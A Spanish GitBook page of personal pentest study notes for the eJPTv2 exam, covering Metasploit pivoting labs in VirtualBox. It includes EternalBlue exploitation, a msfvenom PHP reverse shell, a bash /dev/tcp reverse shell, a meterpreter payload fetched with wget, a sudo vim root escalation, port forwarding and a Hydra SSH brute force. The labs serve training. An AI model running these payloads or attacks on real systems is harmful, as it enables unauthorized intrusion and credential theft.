beafn28
  • 👩‍💻¡Bienvenidos a mi HackBook!
  • WRITEUPS
    • DockerLabs
      • BuscaLove
      • Amor
      • Injection
      • BorazuwarahCTF
      • Trust
      • Picadilly
      • Pinguinazo
      • AguaDeMayo
      • BreakMySSH
      • NodeClimb
      • Move
      • Los 40 ladrones
      • Vulnvault
      • Pntopntobarra
      • Library
      • Escolares
      • ConsoleLog
      • Vacaciones
      • Obsession
      • FirstHacking
      • SecretJenkins
      • HedgeHog
      • AnonymousPingu
      • ChocolateLovers
      • Dockerlabs
      • Pressenter
      • Candy
      • JenkHack
      • ShowTime
      • Upload
      • Verdejo
      • WalkingCMS
      • WhereIsMyWebShell
      • Whoiam
      • Winterfell
      • -Pn
      • Psycho
      • Mirame
      • Backend
      • Paradise
      • Balurero
      • Allien
      • Vendetta
      • FindYourStyle
      • Stellarjwt
      • File
      • Redirection (Por completar)
      • Extraviado
      • Patriaquerida
      • Tproot
      • Internship
      • Walking Dead
      • Bicho (Por completar)
      • BaluFood
    • TryHackMe
      • Brooklyn Nine Nine
      • Blue
    • HackTheBox
      • Nibbles
      • Starting Point
        • Meow
        • Fawn
        • Dancing
        • Redeemer
        • Appointment
        • Sequel
        • Crocodile
        • Responder
        • Three
        • Archetype
        • Oopsie
        • Vaccine
        • Unified
        • Explosion
        • Preignition
        • Mongod
        • Synced
        • Ignition
        • Bike
        • Funnel
        • Pennyworth
        • Tactics
        • Included
        • Markup
        • Base
      • BoardLight
      • Cap
      • TwoMillion
      • Lame
      • Legacy
      • Devel
      • Beep
      • Optimum
      • Arctic
      • Jerry
      • Sau
      • GoodGames
      • Challenges
        • Emdee five for life
        • MarketDump
      • Intro to Dante
      • Heist
      • OpenAdmin
      • Nest
      • Curling
    • Vulnhub
      • Wakanda
      • Election (Por terminar)
    • The Hacker Labs
      • Avengers
      • Can you hack me?
      • Fruits
      • Microchoft
      • TickTakRoot
      • Grillo
      • Mortadela
      • Zapas Guapas
      • Sal y Azúcar
      • Cyberpunk
      • Papafrita
      • PizzaHot
      • Decryptor
      • Academy
      • Cocido andaluz
      • Find Me
      • Quokka
      • Campana Feliz
      • Bocata de Calamares
      • Casa Paco
      • Torrijas
    • Vulnyx
      • Fuser
      • Blogguer
      • Lower
      • Exec
      • Diff3r3ntS3c
      • Hacking Station
      • Experience
      • Eternal
      • Agent
      • Infected
      • Admin
      • War
      • Hosting
    • OverTheWire
      • Natas
        • Nivel 0-5
        • Nivel 6-11
        • Nivel 12-17
        • Nivel 18-23
        • Nivel 24-29
        • Nivel 30-34
      • Leviathan
        • Nivel 0-7
      • Krypton
      • Bandit
        • Nivel 0-10
        • Nivel 11-20
        • Nivel 21-30
        • Nivel 31-34
    • Proving Ground Play
      • Monitoring
      • DriftingBlues6
  • APUNTES HACKING
    • Pentesting Basics
      • Web Enumeration
      • Public Exploits
      • Types of Shells
      • Privilege Escalation
      • Transfering Files
    • Network Enumeration with NMAP
      • Host Discovery
      • Host and Port Scanning
      • Saving the Results
      • Service Enumeration
      • Nmap Scripting Engine
      • Performance
      • Firewall and IDS/IPS Evasion
    • Footprinting
      • Domain Information
      • Cloud Resources
      • FTP
      • SMB
      • NFS
      • DNS
      • SMTP
      • IMAP/POP3
      • SNMP
      • MySQL
      • MSSQL
      • Oracle TNS
      • IPMI
      • Linux Remote Management Protocols
      • Windows Remote Management Protocols
    • Information Gathering - Web Edition
      • WHOIS
      • DNS
        • Digging DNS
      • Subdomains
        • Subdomain Bruteforcing
        • DNS Zone Transfers
        • Virtual Hosts
        • Certificate Transparency Logs
      • Fingerprinting
      • Crawling
        • robots.txt
        • Well-Known URIs
        • Creepy Crawlies
      • Search Engine Discovery
      • Web Archives
      • Automating Recon
    • Vulnerability Assessment
      • Vulnerability Assessment
      • Assessment Standards
      • Common Vulnerability Scoring System (CVSS)
      • Common Vulnerabilities and Exposures (CVE)
    • Nessus
      • Getting Started with Nessus
      • Nessus Scan
      • Advanced Settings
      • Working with Nessus Scan Output
      • Scanning Issues
    • OpenVAS
      • OpenVAS Scan
      • Exporting The Results
    • Reporting
    • File Transfers
      • Windows File Transfer Methods
      • Linux File Transfer Methods
      • Transferring Files with Code
      • Miscellaneous File Transfer Methods
      • Protected File Transfers
      • Catching Files over HTTP/S
      • Living off The Land
      • Detection
      • Evading Detection
    • Shells & Payloads
      • Anatomy of a Shell
      • Bind Shells
      • Reverse Shells
      • Payloads
        • Automating Payloads & Delivery with Metasploit
        • Crafting Payloads with MSFvenom
        • Infiltrating Windows
        • Infiltrating Unix/Linux
        • Spawning Interactive Shells
      • Introduction to Web Shells
        • Laudanum, One Webshell to Rule Them All
        • Antak Webshell
        • PHP Web Shells
      • Detection & Prevention
    • Metasploit
      • MSFConsole
      • Modules
      • Targets
      • Payloads
      • Encoders
      • Databases
      • Plugins
      • Sessions
      • Meterpreter
      • Writing and Importing Modules
      • Introduction to MSFVenom
      • Firewall and IDS/IPS Evasion
    • Password Attacks
      • John The Ripper
      • Network Services
      • Password Mutations
      • Password Reuse / Default Passwords
      • Attacking SAM
      • Attacking LSASS
      • Attacking Active Directory & NTDS.dit
      • Credential Hunting in Windows
      • Credential Hunting in Linux
      • Passwd, Shadow & Opasswd
      • Pass the Hash (PtH)
  • WEB SECURITY
    • Path Traversal
    • SQL Injection
    • Control de Acceso
  • Mis CTFs
    • Pequeñas Mentirosas
    • CryptoLabyrinth
    • Elevator
    • Facultad
  • PREPARAR EJPTv2
    • Máquinas
    • Curso de Mario
      • Presentación + Preparación de Laboratorios
      • Conceptos Básicos de Hacking
      • Explotación de Vulnerabilidades y Ataques de Fuerza Bruta
      • Explotación vulnerabilidades Web
      • Enumeración y Explotación del Protócolo SMB, SAMBA, SNMP, IIS y RDP
      • Hacking Entornos CMS
      • Escalada de Privilegios + Post Explotación
      • Pivoting con Metasploit
  • Preparar OSCP
    • Información
    • Máquinas
      • Linux
        • Fácil
        • Medio
        • Difícil
      • Windows
        • Fácil
        • Medio
        • Difícil
Powered by GitBook
On this page
  • Presentación del Mapa de Red
  • Pivoting en Entornos Windows
  • 1. Configuración de la Red en VirtualBox
  • 2. Configuración de la Máquina Windows 7
  • 3. Configuración de la Máquina Metasploitable2
  • 4. Configuración de la Máquina Kali Linux
  • 5. Orden de Arranque
  • 6. Comprobaciones de Red
  • 7. Infiltración en la Máquina Windows7 y Pivoting
  • Preparación del Laboratorio de Pivoting en Linux
  • 1. Configuración de Red en VirtualBox
  • 2. Detección y Exploración de Vulnerabilidades
  • 3. Acceso a la Máquina Vulnerable
  • 4. Estabilización de la Conexión y Creación de Payload para Meterpreter
  • 5. Configuración de Metasploit para Recibir la Sesión
  • 6. Ejecución del Payload en la Máquina Víctima
  • 7. Escalada de Privilegios
  • 8. Finalización del Pivoting
  • Pivoting en Entornos Linux
  • 1. Identificar las Interfaces de Red
  • 2. Poner en Segundo Plano la Sesión de Meterpreter
  • 3. Añadir Rutas y Configurar Enrutamiento
  • 4. Crear un Script de Escaneo de Red en Bash
  • 5. Transferir el Script a la Máquina Intermedia
  • 6. Escaneo de Puertos con Metasploit
  • 7. Redirección de Puertos (Port Forwarding)
  • 8. Ataque de Fuerza Bruta con Hydra
  • Cómo Hacer Pivoting mediante SSH – [OPCIONAL]
  • 1. Configuración del Entorno
  • 2. Configurar SSH en la Máquina Intermedia (Ubuntu)
  • 3. Conectar Kali Linux a Ubuntu a través de SSHuttle
  • 4. Identificar la IP de la Máquina Objetivo (Metasploitable2)
  • 5. Acceder a la Máquina Objetivo desde Kali Linux

Was this helpful?

  1. PREPARAR EJPTv2
  2. Curso de Mario

Pivoting con Metasploit

PreviousEscalada de Privilegios + Post ExplotaciónNextInformación

Last updated 6 months ago

Was this helpful?

Presentación del Mapa de Red

SI encontramos en una máquina solo una interfaz de red eso signfica que esa no es la que tenemos que hacer Pivoting ya que no se puede. A continuación enseñó un ejemplo de lo que podría ser.

Pivoting en Entornos Windows

Este sería el esquema que vamos a tratar. Se realiza Pivoting en la máquina Windows.

Ahora explicaré cómo configurar una red virtual en VirtualBox y asignar diferentes adaptadores de red a las máquinas virtuales (VM) involucradas en un entorno de pentesting. En este caso, utilizaremos máquinas con Windows 7, Metasploitable2 y Kali Linux.

1. Configuración de la Red en VirtualBox

Acceder al Administrador de Red:

  • En la ventana principal de VirtualBox, dirígete a la barra de menús superior y selecciona Archivo > Herramientas > Administrador de red.

Crear una nueva Red Interna (NAT):

  • En el Administrador de Red, localiza el apartado Redes NAT.

  • Haz clic en el botón Crear para añadir una nueva red.

Asignación de la red NAT:

  • Dale un nombre a la red, por ejemplo, Red_Pivoting.

  • Asigna el prefijo IPv4 de la red como 10.10.10.0/24.

  • Asegúrate de que se haya asignado correctamente y haz clic en Aplicar.

Ahora tienes configurada una red interna (NAT) que utilizarás para conectar las máquinas virtuales.

2. Configuración de la Máquina Windows 7

Acceder a la configuración de la máquina:

  • En VirtualBox, selecciona la máquina de Windows 7 y haz clic en Configuración.

Configuración de adaptadores de red:

  • En el panel de configuración de la máquina, ve a la sección Red.

  • Habilita Adaptador 2, selecciona la opción Conectado a y elige Red NAT. Esta configuración le permitirá a la máquina Windows 7 comunicarse a través de la red NAT que acabamos de crear.

Verificación de interfaces de red:

  • Ahora la máquina Windows 7 tendrá dos interfaces de red: una asociada al adaptador puente (que se conecta a la red física de tu PC) y otra conectada a la red NAT que acabamos de configurar.

3. Configuración de la Máquina Metasploitable2

Configurar adaptador de red en Metasploitable2:

  • Selecciona la máquina Metasploitable2 en VirtualBox y ve a la configuración.

  • Asegúrate de que solo hay un adaptador de red conectado y que esté configurado para usar Red NAT.

Esto asegura que Metasploitable2 estará en la misma red NAT que la máquina Windows 7, pero sin interfaces adicionales que puedan complicar la configuración.

4. Configuración de la Máquina Kali Linux

Configurar adaptador de red para Kali Linux:

  • Selecciona la máquina Kali Linux y abre su configuración en VirtualBox.

  • En la sección Red, configura el Adaptador 1 como un Adaptador puente. Esto hará que Kali Linux se conecte directamente a la red física de tu equipo, permitiéndole interactuar con otras máquinas de la misma red local.

5. Orden de Arranque

  1. Kali Linux: Inicia primero.

  2. Windows 7: Luego, enciende la máquina víctima.

  3. Metasploitable2: Finalmente, arranca la máquina vulnerable.

6. Comprobaciones de Red

Windows 7

  • Abre la terminal y ejecuta ipconfig.

  • Verifica que haya dos interfaces de red: una para el adaptador puente y otra para la red NAT.

Kali Linux

  • Abre la terminal y ejecuta ifconfig.

  • Asegúrate de que solo haya una interfaz de red conectada a la red puente.

Metasploitable2

  • Inicia sesión con:

    • Usuario: msfadmin

    • Contraseña: msfadmin

  • Ejecuta ifconfig y asegúrate de que solo haya una interfaz de red conectada a la red NAT.

7. Infiltración en la Máquina Windows7 y Pivoting

Para identificar las máquinas en la red local:

arp-scan -I eth0 --localnet

Explotación de la Vulnerabilidad EternalBlue.

msfconsole
search eternalblue
use 0
show options
set RHOSTS <IP máquina víctima>
run

En meterpreter.

ipconfig

Busca una segunda IP en la red NAT en la interfaz 13. Esta podría indicar una red interna para pivoting. Si solo hay una IP, tal vez esta máquina no sea adecuada para pivoting.

Poner en Segundo Plano la Sesión de Meterpreter

Ctrl+Z

Para ver las sesiones en segundo plano.

sessions -l

Módulo de Metasploit para encontrar equipos de la Red Interna.

use windows/gather/arp_scanner
show options
set SESSION 1
set RHOSTS <IP máquina víctima>/24 #Rango de las IPs por eso el 24
run

Nos encuentra las distintas IPs de nuestra Red Interna. Ahora quiero que me envíe el tráfico desde la máquina víctima Windows a la máquina víctima objetivo Metasploitable2 para que llegue a mi Kali.

use multi/manage/autoroute
show options
set SESSION 1
run

Ya tenemos el tráfico enrutado. Hacer escaneo de los puertos abiertos de la máquina víctima.

use scanner/portscan/tcp
show options
set RHOSTS <IP máquina víctima>
run

Vemos los puertos abiertos es hacer nmap pero con Metasploit. En caso de hacer el Pivoting en Windows realizamos lo siguiente.

use post/windows/manage/portproxy
show options
set CONNECT_ADDRESS <IP máquina víctima> 
set CONNECT_PORT 80  # Puerto al que queremos acceder
set LOCAL_ADDRESS 0.0.0.0  # Siempre debe ser 0.0.0.0
set LOCAL_PORT 5000  # Puerto local para redirigir el tráfico del puerto objetivo
set SESSION 1  # ID de la sesión de Meterpreter de la máquina Windows
run

Abrimos el navegador con la IP de la máquina Windows 7 con el puerto 5000 porque es donde me he traído el puerto 80.

Preparación del Laboratorio de Pivoting en Linux

1. Configuración de Red en VirtualBox

Para crear una red en VirtualBox y configurar las máquinas necesarias, sigue estos pasos:

Creación de Red NAT:

  • Ve a Archivo > Herramientas > Administrador de red.

  • Crea una red NAT con el nombre Red_Pivoting y asigna la dirección IP 10.10.10.0/24.

Configuración de Máquinas Virtuales:

  • Máquina Kali:

    • En la configuración de red, elige Adaptador puente para el único adaptador de red activo.

  • Máquina Friendly (Máquina intermedia):

    • Configura el primer adaptador como Adaptador puente.

    • Configura el segundo adaptador en modo Red NAT y selecciona la red Red_Pivoting.

  • Máquina Basic (Máquina final):

    • Activa solo un adaptador de red y configúralo en modo Red NAT, seleccionando la red Red_Pivoting.

Iniciar Máquinas:

  • Con las configuraciones completadas, inicia las máquinas en el orden necesario.

2. Detección y Exploración de Vulnerabilidades

Identificación de la Máquina Objetivo

Desde la máquina Kali, ejecuta el siguiente comando para identificar dispositivos en la red local:

arp-scan -I eth0 --localnet

Escaneo de Vulnerabilidades con Nmap

Realiza un escaneo con Nmap en la máquina objetivo para detectar posibles vulnerabilidades. Utiliza el siguiente comando:

nmap -p- -sS -sC -sV --open --min-rate=5000 -vvv -n -Pn <IP máquina víctima>

En los resultados, se observa que los puertos 80 y 21 están abiertos.

3. Acceso a la Máquina Vulnerable

Exploración del Servicio FTP

El puerto 21 (FTP) está abierto, permitiendo autenticación con el usuario anonymous y una contraseña en blanco (comportamiento predeterminado).

Creación del Payload

Genera un payload para obtener acceso remoto con msfvenom:

msfvenom -p php/reverse_php LHOST=<IP máquina atacante> LPORT=443 -f raw > pwnws.php

Subida del Payload

Accede al servicio FTP y sube el payload utilizando el siguiente comando:

put pwned.php

Configuración de Escucha

Pon el puerto 443 en escucha para recibir la conexión inversa:

nc -nlvp 443

Carga del Payload

Para activar el payload y obtener acceso, visita la siguiente URL:

http://<IP máquina víctima>/pwned.php

4. Estabilización de la Conexión y Creación de Payload para Meterpreter

Estabilización de la Conexión

Dado que la conexión inicial no es estable, creamos una nueva escucha en el puerto 444:

nc -nlvp 444

Luego, transferimos la sesión del puerto 443 al 444 con el siguiente comando:

bash -c "sh -i >& /dev/tcp/<IP máquina atacante>/444 0>&1"

Creación de un Payload para Meterpreter

Para mejorar el control sobre la máquina, generamos un payload de Meterpreter con msfvenom:

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP máquina atacante> LPORT=4444 -f elf -b '\x00\x0a\x0d' -o virus

Compartir el Payload

Inicia un servidor web en Python para facilitar la transferencia del archivo malicioso a la máquina víctima:

python3 -m http.server 80

Paso 4: Descargar el Payload en la Máquina Víctima

Desde la sesión activa en la máquina víctima, descarga el payload usando wget:

wget http://1.2.3.4/virus

5. Configuración de Metasploit para Recibir la Sesión

Iniciar el Handler en Metasploit

Abre Metasploit y selecciona el módulo de handler:

use multi/handler

Verificar Opciones del Módulo

Muestra las opciones del módulo seleccionado:

show options

Configuración del Payload

Elige el payload de Meterpreter adecuado para Linux:

set PAYLOAD linux/x86/meterpreter/reverse_tcp

Configuración de Dirección IP

Asigna la dirección IP de la máquina atacante:

set LHOST <IP máquina atacante>

Ejecutar el Handler

Inicia el handler para recibir la sesión:

run

6. Ejecución del Payload en la Máquina Víctima

Asignar Permisos de Ejecución

En la máquina intermedia Friendly, otorga permisos de ejecución al archivo malicioso:

chmod +x virus

Ejecutar el Payload

Inicia la ejecución del archivo para enviar la sesión a Metasploit:

./virus

7. Escalada de Privilegios

Para realizar pivoting, necesitamos obtener privilegios de root ya que como usuarios www-data tenemos permisos limitados.

Paso 1: Verificación de Permisos

Comprobamos los permisos sudo del usuario actual:

sudo -l

El resultado muestra que podemos ejecutar el binario /usr/bin/vim con privilegios elevados. Antes de continuar, configuramos el TTY:

script /dev/null -c bash

Paso 2: Escalada de Privilegios con Vim

Consultando GTFOBins, encontramos el comando para escalar privilegios utilizando vim:

sudo vim -c ':!/bin/sh'

8. Finalización del Pivoting

Con la sesión de root obtenida, podemos completar el proceso de pivoting ejecutando el payload en la máquina intermedia:

./virus

Pivoting en Entornos Linux

1. Identificar las Interfaces de Red

Desde el intérprete de Meterpreter en la máquina intermedia Friendly, listamos las interfaces de red para visualizar la red interna:

ipconfig

Observaremos dos interfaces de red:

  • Friendly: máquina intermedia.

  • Basic: la máquina final en la red interna.

2. Poner en Segundo Plano la Sesión de Meterpreter

Para escanear otros dispositivos en la red, enviamos la sesión actual de Meterpreter a segundo plano:

Usar Ctrl + Z para minimizar la sesión.

Confirmar que la sesión sigue activa con:

sessions -l

3. Añadir Rutas y Configurar Enrutamiento

Configuramos el enrutamiento para escanear la red interna cargando el módulo autoroute en Metasploit:

use multi/manage/autoroute

Asigna el SESSION ID adecuado (en este caso, 1):

set SESSION 1

Ejecuta el módulo:

run

Verifica el enrutamiento configurado:

route

4. Crear un Script de Escaneo de Red en Bash

Para identificar otros dispositivos en la red interna, creamos un script en bash. En tu máquina local, crea el archivo:

nano escaner.sh

Incluye el siguiente contenido en el script:

#!/bin/bash

for i in {1..255}; do
  timeout 1 bash -c "ping -c 1 10.0.10.$i" >/dev/null
  if [ $? -eq 0 ]; then
    echo "El host 10.0.10.$i está activo"
  fi
done

Este script envía un ping a las IPs en el rango 10.0.10.1 - 10.0.10.255 para identificar hosts activos.

5. Transferir el Script a la Máquina Intermedia

Para transferir el script a la máquina intermedia:

Inicia un servidor HTTP en tu máquina:

python3 -m http.server 80

Desde la sesión de Meterpreter, descarga el script en Friendly:

wget <IP del servidor>/escaner.sh

Verifica que el archivo se transfirió correctamente:

ls

Asigna permisos de ejecución al archivo:

chmod +x escaner.sh

Ejecuta el script para ver los hosts activos en la red interna:

./escaner.sh

6. Escaneo de Puertos con Metasploit

En Metasploit, usa el módulo de escaneo de puertos TCP para analizar la IP identificada.

use scanner/portscan/tcp
set RHOSTS <IP máquina víctima>
run

Este módulo muestra los puertos abiertos en la máquina objetivo.

7. Redirección de Puertos (Port Forwarding)

Para acceder a los servicios en la máquina víctima, redirigimos sus puertos hacia nuestro equipo local.

Ejemplo de redirección para SSH en el puerto 22 hacia el puerto 222 en tu máquina:

session -i 1
portfwd add -l 222 -p 22 -r <IP máquina víctima>

Conéctate al servicio SSH desde tu terminal local:

ssh dimitri@127.0.0.1 -p 222

Si necesitas redirigir otro puerto, como el 631, puedes mapearlo al puerto 5000 en tu equipo:

portfwd add -l 5000 -p 631 -r 1.1.1.8

Ahora puedes acceder al servicio en tu navegador en 127.0.0.1:5000.

8. Ataque de Fuerza Bruta con Hydra

Para realizar un ataque de fuerza bruta en el servicio SSH, utiliza Hydra:

hydra -l dimitri -P /usr/share/wordlists/rockyou.txt ssh://127.0.0.1 -s 222

Cómo Hacer Pivoting mediante SSH – [OPCIONAL]

1. Configuración del Entorno

En este escenario, tenemos tres máquinas configuradas de la siguiente manera:

  1. Máquina Atacante: Kali Linux

    • Conexión de red: Adaptador en modo puente.

  2. Máquina Intermedia: Ubuntu

    • Conexión de red: Adaptador en modo puente y otro adaptador en red interna.

  3. Máquina Objetivo: Metasploitable2

    • Conexión de red: Adaptador en modo red interna (conectada solo con la máquina intermedia Ubuntu).

Objetivo: Realizar un pivoting desde Kali Linux para acceder a la máquina Metasploitable2 a través de Ubuntu, utilizando SSH y la herramienta SSHuttle.

2. Configurar SSH en la Máquina Intermedia (Ubuntu)

  1. Instalar y habilitar SSH en la máquina intermedia Ubuntu si no está ya configurado:

    sudo apt update
    sudo apt install openssh-server -y
    sudo systemctl enable ssh
    sudo systemctl start ssh
  2. Verificar las interfaces de red en Ubuntu para identificar las IP disponibles:

    bashCopiar códigohostname -I

    Esto mostrará las direcciones IP asignadas a cada interfaz. Necesitaremos la IP del adaptador en modo puente para conectarnos desde Kali Linux.

3. Conectar Kali Linux a Ubuntu a través de SSHuttle

  1. En Kali Linux, usa SSHuttle para enrutar el tráfico de red hacia la red interna de Ubuntu, permitiendo el acceso a la máquina Metasploitable2:

    sshuttle -r <usuario_en_ubuntu>@<IP_de_ubuntu> 10.10.10.0/24

    Donde:

    • <usuario_en_ubuntu> es el usuario en la máquina Ubuntu.

    • <IP_de_ubuntu> es la dirección IP del adaptador en modo puente en la máquina Ubuntu.

    • 10.10.10.0/24 es el rango de la red interna (ajusta este rango según la configuración de tu red interna).

    Explicación: El comando indica a SSHuttle que redirija todo el tráfico para la red 10.10.10.0/24 a través de la conexión SSH con Ubuntu. Esto nos permite "pivotar" hacia la máquina Metasploitable2, situada en la red interna.

4. Identificar la IP de la Máquina Objetivo (Metasploitable2)

En la máquina intermedia (Ubuntu), ejecuta arp-scan para descubrir los dispositivos conectados en la red interna y obtener la IP de la máquina Metasploitable2:

sudo arp-scan -I enp0s8 --localnet

Donde:

  • enp0s8 es la interfaz configurada en red interna en Ubuntu (ajusta el nombre de la interfaz según tu sistema).

Este comando mostrará las IPs de los dispositivos activos en la red interna. Anota la IP de Metasploitable2 para acceder a ella en el siguiente paso.

5. Acceder a la Máquina Objetivo desde Kali Linux

Ahora, desde Kali Linux, puedes acceder directamente a la máquina Metasploitable2 usando la IP obtenida en el paso anterior.

Puedes, por ejemplo, abrir la IP de Metasploitable2 en un navegador o realizar escaneos de puertos utilizando herramientas como nmap:

nmap -sV <IP_de_metasploitable2>

Esto te permitirá enumerar servicios y realizar pruebas en la máquina objetivo como si estuviera en la misma red que Kali Linux.

Windows 7.ovaGoogle Docs
Metasploitable - Browse /Metasploitable2 at SourceForge.net
Metasploitable - Browse /Metasploitable2 at SourceForge.net
https://hackmyvm.eu/machines/machine.php?vm=Friendlyhackmyvm.eu
VulNyxVulNyx
Logo
Logo
Logo
Logo